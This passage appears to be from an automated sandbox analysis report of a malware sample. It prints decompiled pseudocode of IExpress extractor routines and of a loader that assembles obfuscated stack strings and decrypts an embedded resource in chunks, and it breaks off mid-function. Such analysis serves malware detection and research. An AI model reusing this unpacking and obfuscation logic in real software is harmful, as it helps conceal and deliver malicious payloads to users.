WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0094645B
CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0094647A

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 009463EB

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: File$CloseCreateHandleWrite
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
API String ID: 1065093856-3699071305
Opcode ID: 08c1742377f549235892a3a466cd0de3b8a2f35969910339b810aba21a800908
Instruction ID: 6557f4d3fbad7228aee51894ce297dc063fa58ff60671e3078f4a5b4a1ce8737
Opcode Fuzzy Hash: 08c1742377f549235892a3a466cd0de3b8a2f35969910339b810aba21a800908
Instruction Fuzzy Hash: B021D2B5A04218ABDB20DF25DC85FEB776CEB8A314F0041A9F585A3290DAB45D848FA5

Uniqueness

Uniqueness Score: -1.00%

Function 009447E0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E009447E0(intOrPtr* __ecx) {
				intOrPtr _t6;
				intOrPtr _t9;
				void* _t11;
				void* _t19;
				intOrPtr* _t22;
				void _t24;
				struct HWND__* _t25;
				struct HWND__* _t26;
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t33;
				void* _t34;

				_t33 = __ecx;
				_t34 = LocalAlloc(0x40, 8);
				if(_t34 != 0) {
					_t22 = _t33;
					_t27 = _t22 + 1;
					do {
						_t6 =  *_t22;
						_t22 = _t22 + 1;
					} while (_t6 != 0);
					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
					 *_t34 = _t24;
					if(_t24 != 0) {
						_t28 = _t33;
						_t19 = _t28 + 1;
						do {
							_t9 =  *_t28;
							_t28 = _t28 + 1;
						} while (_t9 != 0);
						E00941680(_t24, _t28 - _t19 + 1, _t33);
						_t11 =  *0x9491e0; // 0x3087c30
						 *(_t34 + 4) = _t11;
						 *0x9491e0 = _t34;
						return 1;
					}
					_t25 =  *0x948584; // 0x0
					E009444B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
					LocalFree(_t34);
					L2:
					return 0;
				}
				_t26 =  *0x948584; // 0x0
				E009444B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
				goto L2;
			}

0x009447e8
0x009447f0
0x009447f4
0x0094480f
0x00944811
0x00944814
0x00944814
0x00944816
0x00944817
0x00944829
0x0094482b
0x0094482f
0x0094484f
0x00944852
0x00944855
0x00944855
0x00944857
0x00944858
0x00944860
0x00944865
0x0094486a
0x0094486f
0x00000000
0x00944876
0x00944831
0x00944841
0x00944847
0x0094480b
0x00000000
0x0094480b
0x009447f6
0x00944806
0x00000000

APIs

LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00944E6F), ref: 009447EA
LocalAlloc.KERNEL32(00000040,?), ref: 00944823
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00944847

Part of subcall function 009444B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00944518
Part of subcall function 009444B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00944554

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00944851

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: Local$Alloc$FreeLoadMessageString
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
API String ID: 359063898-3699071305
Opcode ID: 322af76b698df78ca43516a7aa3dc2e167b6d353f5307acaaee02c9bc020de1e
Instruction ID: e260efddc3b490a3000d04854d774861a5b159e4366c59669e1aa80f9abc3aca
Opcode Fuzzy Hash: 322af76b698df78ca43516a7aa3dc2e167b6d353f5307acaaee02c9bc020de1e
Instruction Fuzzy Hash: C11108796086416FEB289F349C18F773B9AEBC6300F048559FA82DB741DA35DC069760

Uniqueness

Uniqueness Score: -1.00%

Function 00943680 Relevance: 6.1, APIs: 4, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00943680(void* __ecx) {
				void* _v8;
				struct tagMSG _v36;
				int _t8;
				struct HWND__* _t16;

				_v8 = __ecx;
				_t16 = 0;
				while(1) {
					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
					if(_t8 == 0) {
						break;
					}
					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
						continue;
					} else {
						do {
							if(_v36.message != 0x12) {
								DispatchMessageA( &_v36);
							} else {
								_t16 = 1;
							}
							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
						} while (_t8 != 0);
						if(_t16 == 0) {
							continue;
						}
					}
					break;
				}
				return _t8;
			}

0x0094368c
0x0094368f
0x00943691
0x0094369f
0x009436a7
0x00000000
0x00000000
0x009436ba
0x00000000
0x009436bc
0x009436bc
0x009436c0
0x009436cb
0x009436c2
0x009436c4
0x009436c4
0x009436da
0x009436e0
0x009436e6
0x00000000
0x00000000
0x009436e6
0x00000000
0x009436ba
0x009436ed

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0094369F
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 009436B2
DispatchMessageA.USER32(?), ref: 009436CB
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 009436DA

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: Message$Peek$DispatchMultipleObjectsWait
String ID:
API String ID: 2776232527-0
Opcode ID: d04113ced602530d7169853f48a424d20fb29c5a3060a48797c1d89e340c5896
Instruction ID: 225123b299be7af0753af0d54f427f9c8374d88c1ca36bb16c636733925e30ac
Opcode Fuzzy Hash: d04113ced602530d7169853f48a424d20fb29c5a3060a48797c1d89e340c5896
Instruction Fuzzy Hash: 2F01A7769442557BDB304BB65C49EEB767CEBCAB10F014119F915E2180D561C640DA60

Uniqueness

Uniqueness Score: -1.00%

Function 00946517 Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00946517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
				struct HRSRC__* _t6;
				void* _t21;
				struct HINSTANCE__* _t23;
				int _t24;

				_t23 =  *0x949a3c; // 0x940000
				_t6 = FindResourceA(_t23, __edx, 5);
				if(_t6 == 0) {
					L6:
					E009444B9(0, 0x4fb, 0, 0, 0x10, 0);
					_t24 = _a16;
				} else {
					_t21 = LoadResource(_t23, _t6);
					if(_t21 == 0) {
						goto L6;
					} else {
						if(_a12 != 0) {
							_push(_a12);
						} else {
							_push(0);
						}
						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
						FreeResource(_t21);
						if(_t24 == 0xffffffff) {
							goto L6;
						}
					}
				}
				return _t24;
			}

0x0094651f
0x0094652a
0x00946534
0x0094656b
0x00946577
0x0094657c
0x00946536
0x0094653e
0x00946542
0x00000000
0x00946544
0x00946547
0x0094654c
0x00946549
0x00946549
0x00946549
0x0094655e
0x00946560
0x00946569
0x00000000
0x00000000
0x00946569
0x00946542
0x00946587

APIs

FindResourceA.KERNEL32(00940000,000007D6,00000005), ref: 0094652A
LoadResource.KERNEL32(00940000,00000000,?,?,00942EE8,00000000,009419E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00946538
DialogBoxIndirectParamA.USER32(00940000,00000000,00000547,009419E0,00000000), ref: 00946557
FreeResource.KERNEL32(00000000,?,?,00942EE8,00000000,009419E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00946560

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: Resource$DialogFindFreeIndirectLoadParam
String ID:
API String ID: 1214682469-0
Opcode ID: 7396fcb3b93bf7db2db4afa7d84243edac1391832954ffcdd2f044655d1d86b6
Instruction ID: 423535402c02fbde77f7c20bf17c9f4c59c39a03da32754c514224d4abfe6949
Opcode Fuzzy Hash: 7396fcb3b93bf7db2db4afa7d84243edac1391832954ffcdd2f044655d1d86b6
Instruction Fuzzy Hash: 3501F9B3104615BBDB205FA99C48EBB7B6CEB8B761F000125FE14A3150D771DD10D7A2

Uniqueness

Uniqueness Score: -1.00%

Function 009465E8 Relevance: 6.0, APIs: 4, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E009465E8(char* __ecx) {
				char _t3;
				char _t10;
				char* _t12;
				char* _t14;
				char* _t15;
				CHAR* _t16;

				_t12 = __ecx;
				_t15 = __ecx;
				_t14 =  &(__ecx[1]);
				_t10 = 0;
				do {
					_t3 =  *_t12;
					_t12 =  &(_t12[1]);
				} while (_t3 != 0);
				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
				while(1) {
					_t16 = CharPrevA(_t15, ??);
					if(_t16 <= _t15) {
						break;
					}
					if( *_t16 == 0x5c) {
						L7:
						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
							_t16 = CharNextA(_t16);
						}
						 *_t16 = _t10;
						_t10 = 1;
					} else {
						_push(_t16);
						continue;
					}
					L11:
					return _t10;
				}
				if( *_t16 == 0x5c) {
					goto L7;
				}
				goto L11;
			}

0x009465e8
0x009465ed
0x009465ef
0x009465f2
0x009465f4
0x009465f4
0x009465f6
0x009465f7
0x00946608
0x00946611
0x00946618
0x0094661c
0x00000000
0x00000000
0x0094660e
0x00946623
0x00946625
0x0094663b
0x0094663b
0x0094663d
0x00946641
0x00946610
0x00946610
0x00000000
0x00946610
0x00946644
0x00946647
0x00946647
0x00946621
0x00000000
0x00000000
0x00000000

APIs

CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00942B33), ref: 00946602
CharPrevA.USER32(?,00000000), ref: 00946612
CharPrevA.USER32(?,00000000), ref: 00946629
CharNextA.USER32(00000000), ref: 00946635

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: Char$Prev$Next
String ID:
API String ID: 3260447230-0
Opcode ID: b97c466ef14e42ce8225efa6a1d5224149428c30f68013f51e7b88f63d6226cf
Instruction ID: 5c4a93fe327c848a6e363d503da842e30a9a2036b236fc01e1580d10f1b3d5e7
Opcode Fuzzy Hash: b97c466ef14e42ce8225efa6a1d5224149428c30f68013f51e7b88f63d6226cf
Instruction Fuzzy Hash: 6BF028B60081906EE7321B288C88CBBBF9CCF8B355B2A01AFE49182001D6150D469B63

Uniqueness

Uniqueness Score: -1.00%

Function 009469B0 Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E009469B0() {
				intOrPtr* _t4;
				intOrPtr* _t5;
				void* _t6;
				intOrPtr _t11;
				intOrPtr _t12;

				 *0x9481f8 = E00946C70();
				__set_app_type(E00946FBE(2));
				 *0x9488a4 =  *0x9488a4 | 0xffffffff;
				 *0x9488a8 =  *0x9488a8 | 0xffffffff;
				_t4 = __p__fmode();
				_t11 =  *0x948528; // 0x0
				 *_t4 = _t11;
				_t5 = __p__commode();
				_t12 =  *0x94851c; // 0x0
				 *_t5 = _t12;
				_t6 = E00947000();
				if( *0x948000 == 0) {
					__setusermatherr(E00947000);
				}
				E009471EF(_t6);
				return 0;
			}

0x009469b7
0x009469c2
0x009469c8
0x009469cf
0x009469d8
0x009469de
0x009469e4
0x009469e6
0x009469ec
0x009469f2
0x009469f4
0x00946a00
0x00946a07
0x00946a0d
0x00946a0e
0x00946a15

APIs

Part of subcall function 00946FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00946FC5

__set_app_type.MSVCRT ref: 009469C2
__p__fmode.MSVCRT ref: 009469D8
__p__commode.MSVCRT ref: 009469E6
__setusermatherr.MSVCRT ref: 00946A07

Memory Dump Source

Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true

Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_bfCg.jbxd

Similarity

API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
String ID:
API String ID: 1632413811-0
Opcode ID: f7b11268a53a16159b32b135e989d07524527dbda8f805cfbaa150da90c97244
Instruction ID: 2c0f497e831c797021614b83a2ba864b0e5abe7d873fec7e126219b09cd86c66
Opcode Fuzzy Hash: f7b11268a53a16159b32b135e989d07524527dbda8f805cfbaa150da90c97244
Instruction Fuzzy Hash: B8F0F8B856D7059FD718AF70BD0AE0A7B61FB87329B100649E461862F0CF7A8544BA11

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: afCf.exePID: 2360, Parent PID: 2564COMMON

Execution Graph

Execution Coverage:	4%
Dynamic/Decrypted Code Coverage:	29.5%
Signature Coverage:	14.3%
Total number of Nodes:	349
Total number of Limit Nodes:	37

Executed Functions

Function 004019F0 Relevance: 147.7, APIs: 34, Strings: 50, Instructions: 747
comprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E004019F0(void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t337;
				void* _t340;
				int _t341;
				CHAR* _t344;
				intOrPtr* _t349;
				int _t350;
				long _t352;
				signed int _t354;
				intOrPtr _t358;
				long _t359;
				CHAR* _t364;
				struct HINSTANCE__* _t365;
				CHAR* _t366;
				_Unknown_base(*)()* _t367;
				int _t368;
				int _t369;
				int _t370;
				intOrPtr* _t376;
				int _t378;
				intOrPtr _t379;
				intOrPtr* _t381;
				int _t383;
				intOrPtr* _t384;
				int _t385;
				int _t396;
				int _t399;
				int _t402;
				int _t405;
				intOrPtr* _t407;
				int _t413;
				int _t415;
				void* _t421;
				int _t422;
				int _t424;
				intOrPtr* _t428;
				intOrPtr _t429;
				intOrPtr* _t431;
				int _t432;
				int _t435;
				intOrPtr* _t437;
				int _t438;
				intOrPtr* _t439;
				int _t440;
				int _t442;
				signed int _t448;
				signed int _t451;
				signed int _t452;
				int _t469;
				int _t471;
				int _t482;
				signed int _t486;
				intOrPtr* _t488;
				intOrPtr* _t490;
				intOrPtr* _t492;
				intOrPtr _t493;
				void* _t494;
				struct HRSRC__* _t497;
				void* _t514;
				int _t519;
				intOrPtr* _t520;
				void* _t524;
				void* _t525;
				struct HINSTANCE__* _t526;
				intOrPtr _t527;
				void* _t531;
				void* _t535;
				struct HRSRC__* _t536;
				intOrPtr* _t537;
				intOrPtr* _t539;
				int _t542;
				int _t543;
				intOrPtr* _t547;
				intOrPtr* _t548;
				intOrPtr* _t549;
				intOrPtr* _t550;
				void* _t551;
				intOrPtr _t552;
				int _t555;
				void* _t556;
				void* _t557;
				void* _t558;
				void* _t559;
				void* _t560;
				void* _t561;
				void* _t562;
				intOrPtr* _t563;
				void* _t564;
				void* _t565;
				void* _t566;
				void* _t567;

				_t567 = __eflags;
				_t494 = __edx;
				__imp__OleInitialize(0); // executed
				 *((char*)(_t556 + 0x18)) = 0xe0;
				 *((char*)(_t556 + 0x19)) = 0x3b;
				 *((char*)(_t556 + 0x1a)) = 0x8d;
				 *((char*)(_t556 + 0x1b)) = 0x2a;
				 *((char*)(_t556 + 0x1c)) = 0xa2;
				 *((char*)(_t556 + 0x1d)) = 0x2a;
				 *((char*)(_t556 + 0x1e)) = 0x2a;
				 *((char*)(_t556 + 0x1f)) = 0x41;
				 *((char*)(_t556 + 0x20)) = 0xd3;
				 *((char*)(_t556 + 0x21)) = 0x20;
				 *((char*)(_t556 + 0x22)) = 0x64;
				 *((char*)(_t556 + 0x23)) = 6;
				 *((char*)(_t556 + 0x24)) = 0x8a;
				 *((char*)(_t556 + 0x25)) = 0xf7;
				 *((char*)(_t556 + 0x26)) = 0x3d;
				 *((char*)(_t556 + 0x27)) = 0x9d;
				 *((char*)(_t556 + 0x28)) = 0xd9;
				 *((char*)(_t556 + 0x29)) = 0xee;
				 *((char*)(_t556 + 0x2a)) = 0x15;
				 *((char*)(_t556 + 0x2b)) = 0x68;
				 *((char*)(_t556 + 0x2c)) = 0xf4;
				 *((char*)(_t556 + 0x2d)) = 0x76;
				 *((char*)(_t556 + 0x2e)) = 0xb9;
				 *((char*)(_t556 + 0x2f)) = 0x34;
				 *((char*)(_t556 + 0x30)) = 0xbf;
				 *((char*)(_t556 + 0x31)) = 0x1e;
				 *((char*)(_t556 + 0x32)) = 0xe7;
				 *((char*)(_t556 + 0x33)) = 0x78;
				 *((char*)(_t556 + 0x34)) = 0x98;
				 *((char*)(_t556 + 0x35)) = 0xe9;
				 *((char*)(_t556 + 0x36)) = 0x6f;
				 *((char*)(_t556 + 0x37)) = 0xb4;
				 *((char*)(_t556 + 0x38)) = 0;
				_push(E00401650(_t556 + 0x14, _t556 + 0x114));
				_t337 = E0040B99E(0, _t494, _t524, _t535, _t567);
				_t557 = _t556 + 0xc;
				if(_t337 == 0x41b2a0) {
					L80:
					__eflags = 0;
					return 0;
				} else {
					_t340 = CreateToolhelp32Snapshot(8, GetCurrentProcessId()); // executed
					_t525 = _t340;
					 *((intOrPtr*)(_t557 + 0x280)) = 0x224;
					 *((char*)(_t557 + 0x64)) = 0xce;
					 *((char*)(_t557 + 0x65)) = 0x27;
					 *((char*)(_t557 + 0x66)) = 0x9c;
					 *((char*)(_t557 + 0x67)) = 0x1a;
					 *((char*)(_t557 + 0x68)) = 0x95;
					 *((char*)(_t557 + 0x69)) = 0x2e;
					 *((char*)(_t557 + 0x6a)) = 0x22;
					 *((char*)(_t557 + 0x6b)) = 0x57;
					 *((char*)(_t557 + 0x6c)) = 0x91;
					 *((char*)(_t557 + 0x6d)) = 0x21;
					 *((char*)(_t557 + 0x6e)) = 0x57;
					 *((char*)(_t557 + 0x6f)) = 0x3a;
					 *((char*)(_t557 + 0x70)) = 0xf8;
					 *((char*)(_t557 + 0x71)) = 0x98;
					 *((char*)(_t557 + 0x72)) = 0x5b;
					 *((char*)(_t557 + 0x73)) = 0xf4;
					 *((char*)(_t557 + 0x74)) = 0xb5;
					 *((char*)(_t557 + 0x75)) = 0x87;
					 *((char*)(_t557 + 0x76)) = 0x7b;
					 *((char*)(_t557 + 0x77)) = 0xf;
					 *((char*)(_t557 + 0x78)) = 0xf4;
					 *((char*)(_t557 + 0x79)) = 0x76;
					 *((char*)(_t557 + 0x7a)) = 0xb9;
					 *((char*)(_t557 + 0x7b)) = 0x34;
					 *((char*)(_t557 + 0x7c)) = 0xbf;
					 *((char*)(_t557 + 0x7d)) = 0x1e;
					 *((char*)(_t557 + 0x7e)) = 0xe7;
					 *((char*)(_t557 + 0x7f)) = 0x78;
					 *((char*)(_t557 + 0x80)) = 0x98;
					 *((char*)(_t557 + 0x81)) = 0xe9;
					 *((char*)(_t557 + 0x82)) = 0x6f;
					 *((char*)(_t557 + 0x83)) = 0xb4;
					 *((char*)(_t557 + 0x84)) = 0;
					 *((char*)(_t557 + 0x18)) = 0xc0;
					 *((char*)(_t557 + 0x19)) = 0x38;
					 *((char*)(_t557 + 0x1a)) = 0x8d;
					 *((char*)(_t557 + 0x1b)) = 0x1f;
					 *((char*)(_t557 + 0x1c)) = 0x8e;
					 *((char*)(_t557 + 0x1d)) = 0x30;
					 *((char*)(_t557 + 0x1e)) = 0x65;
					 *((char*)(_t557 + 0x1f)) = 0x47;
					 *((char*)(_t557 + 0x20)) = 0xd3;
					 *((char*)(_t557 + 0x21)) = 0x29;
					 *((char*)(_t557 + 0x22)) = 0x3b;
					 *((char*)(_t557 + 0x23)) = 0x56;
					 *((char*)(_t557 + 0x24)) = 0xf8;
					 *((char*)(_t557 + 0x25)) = 0x98;
					 *((char*)(_t557 + 0x26)) = 0x5b;
					 *((char*)(_t557 + 0x27)) = 0xf4;
					 *((char*)(_t557 + 0x28)) = 0xb5;
					 *((char*)(_t557 + 0x29)) = 0x87;
					 *((char*)(_t557 + 0x2a)) = 0x7b;
					 *((char*)(_t557 + 0x2b)) = 0xf;
					 *((char*)(_t557 + 0x2c)) = 0xf4;
					 *((char*)(_t557 + 0x2d)) = 0x76;
					 *((char*)(_t557 + 0x2e)) = 0xb9;
					 *((char*)(_t557 + 0x2f)) = 0x34;
					 *((char*)(_t557 + 0x30)) = 0xbf;
					 *((char*)(_t557 + 0x31)) = 0x1e;
					 *((char*)(_t557 + 0x32)) = 0xe7;
					 *((char*)(_t557 + 0x33)) = 0x78;
					 *((char*)(_t557 + 0x34)) = 0x98;
					 *((char*)(_t557 + 0x35)) = 0xe9;
					 *((char*)(_t557 + 0x36)) = 0x6f;
					 *((char*)(_t557 + 0x37)) = 0xb4;
					 *((char*)(_t557 + 0x38)) = 0;
					_t341 = Module32First(_t525, _t557 + 0x278); // executed
					if(_t341 == 0) {
						L38:
						FindCloseChangeNotification(_t525); // executed
						_t526 = GetModuleHandleA(0);
						 *((char*)(_t557 + 0x1c)) = 0xfc;
						 *((char*)(_t557 + 0x1d)) = 0xb;
						 *((char*)(_t557 + 0x1e)) = 0xff;
						 *((char*)(_t557 + 0x1f)) = 0x75;
						 *((char*)(_t557 + 0x20)) = 0xe7;
						 *((char*)(_t557 + 0x21)) = 0x44;
						 *((char*)(_t557 + 0x22)) = 0x4b;
						 *((char*)(_t557 + 0x23)) = 0x23;
						 *((char*)(_t557 + 0x24)) = 0xbf;
						 *((char*)(_t557 + 0x25)) = 0x45;
						 *((char*)(_t557 + 0x26)) = 0x3b;
						 *((char*)(_t557 + 0x27)) = 0x56;
						 *((char*)(_t557 + 0x28)) = 0xf8;
						 *((char*)(_t557 + 0x29)) = 0x98;
						 *((char*)(_t557 + 0x2a)) = 0x5b;
						 *((char*)(_t557 + 0x2b)) = 0xf4;
						 *((char*)(_t557 + 0x2c)) = 0xb5;
						 *((char*)(_t557 + 0x2d)) = 0x87;
						 *((char*)(_t557 + 0x2e)) = 0x7b;
						 *((char*)(_t557 + 0x2f)) = 0xf;
						 *((char*)(_t557 + 0x30)) = 0xf4;
						 *((char*)(_t557 + 0x31)) = 0x76;
						 *((char*)(_t557 + 0x32)) = 0xb9;
						 *((char*)(_t557 + 0x33)) = 0x34;
						 *((char*)(_t557 + 0x34)) = 0xbf;
						 *((char*)(_t557 + 0x35)) = 0x1e;
						 *((char*)(_t557 + 0x36)) = 0xe7;
						 *((char*)(_t557 + 0x37)) = 0x78;
						 *((char*)(_t557 + 0x38)) = 0x98;
						 *((char*)(_t557 + 0x39)) = 0xe9;
						 *((char*)(_t557 + 0x3a)) = 0x6f;
						 *((char*)(_t557 + 0x3b)) = 0xb4;
						 *((char*)(_t557 + 0x3c)) = 0;
						_t344 = E00401650(_t557 + 0x18, _t557 + 0x158);
						_t558 = _t557 + 8;
						_t536 = FindResourceA(_t526, _t344, 0xa);
						 *(_t558 + 0x50) = _t536;
						_t551 = LoadResource(_t526, _t536);
						 *((intOrPtr*)(_t558 + 0x44)) = LockResource(_t551);
						_t349 = E0040B84D(0, _t557 + 0x18, _t526, SizeofResource(_t526, _t536)); // executed
						_push(0x40022);
						_t537 = _t349; // executed
						_t350 = E0040AF66(0, _t526, __eflags); // executed
						_t559 = _t558 + 8;
						 *(_t559 + 0x34) = _t350;
						__eflags = _t350;
						if(_t350 == 0) {
							 *(_t559 + 0x50) = 0;
						} else {
							E0040BA30(_t526, _t350, 0, 0x40022);
							_t486 =  *(_t559 + 0x40);
							_t559 = _t559 + 0xc;
							 *(_t559 + 0x50) = _t486;
						}
						E00401300( *(_t559 + 0x50));
						_t497 =  *(_t559 + 0x48);
						_t352 = SizeofResource(_t526, _t497);
						 *(_t559 + 0x40) = _t352;
						asm("cdq");
						_t354 = _t352 + (_t497 & 0x000003ff) >> 0xa;
						__eflags = _t354;
						if(_t354 > 0) {
							_t519 =  *(_t559 + 0x3c);
							_t482 = _t537 - _t519;
							__eflags = _t482;
							 *(_t559 + 0x34) = _t519;
							 *(_t559 + 0x88) = _t482;
							 *(_t559 + 0x38) = _t354;
							do {
								_t424 =  *(_t559 + 0x34);
								_push( *(_t559 + 0x88) + _t424);
								_push(0x400);
								_push(_t424);
								E00401560(0,  *((intOrPtr*)(_t559 + 0x54)));
								 *(_t559 + 0x34) =  *(_t559 + 0x34) + 0x400;
								_t179 = _t559 + 0x38;
								 *_t179 =  *(_t559 + 0x38) - 1;
								__eflags =  *_t179;
							} while ( *_t179 != 0);
						}
						_t448 =  *(_t559 + 0x40) & 0x800003ff;
						__eflags = _t448;
						if(_t448 < 0) {
							_t448 = (_t448 - 0x00000001 | 0xfffffc00) + 1;
							__eflags = _t448;
						}
						__eflags = _t448;
						if(_t448 > 0) {
							_t421 =  *(_t559 + 0x40) - _t448;
							_push(_t421 + _t537);
							_push(_t448);
							_t422 = _t421 +  *((intOrPtr*)(_t559 + 0x44));
							__eflags = _t422;
							_push(_t422);
							E00401560(0,  *((intOrPtr*)(_t559 + 0x58)));
						}
						E0040BA30(_t526,  *(_t559 + 0x3c), 0,  *(_t559 + 0x40));
						_t560 = _t559 + 0xc;
						FreeResource(_t551);
						_t552 =  *_t537;
						 *((intOrPtr*)(_t560 + 0x94)) = _t552;
						_t358 = E0040B84D(0,  *(_t559 + 0x40), _t526, _t552); // executed
						_t561 = _t560 + 4;
						 *((intOrPtr*)(_t561 + 0x40)) = _t358;
						_t359 = SizeofResource(_t526,  *(_t560 + 0x4c));
						_t527 =  *((intOrPtr*)(_t561 + 0x38));
						_t192 = _t537 + 4; // 0x4
						E0040AC60(_t527, _t561 + 0x98, _t192, _t359);
						E0040BA30(_t527, _t537, 0,  *((intOrPtr*)(_t561 + 0x50)));
						_t528 = _t527 + 0xe;
						 *((char*)(_t561 + 0x34)) = 0xce;
						 *((char*)(_t561 + 0x35)) = 0x27;
						 *((char*)(_t561 + 0x36)) = 0x9c;
						 *((char*)(_t561 + 0x37)) = 0x1a;
						 *((char*)(_t561 + 0x38)) = 0x95;
						 *((char*)(_t561 + 0x39)) = 0x21;
						 *((char*)(_t561 + 0x3a)) = 0x2e;
						 *((char*)(_t561 + 0x3b)) = 0xd;
						 *((char*)(_t561 + 0x3c)) = 0xdb;
						 *((char*)(_t561 + 0x3d)) = 0x29;
						 *((char*)(_t561 + 0x3e)) = 0x57;
						 *((char*)(_t561 + 0x3f)) = 0x56;
						 *((char*)(_t561 + 0x40)) = 0xf8;
						 *((char*)(_t561 + 0x41)) = 0x98;
						 *((char*)(_t561 + 0x42)) = 0x5b;
						 *((char*)(_t561 + 0x43)) = 0xf4;
						 *((char*)(_t561 + 0x44)) = 0xb5;
						 *((char*)(_t561 + 0x45)) = 0x87;
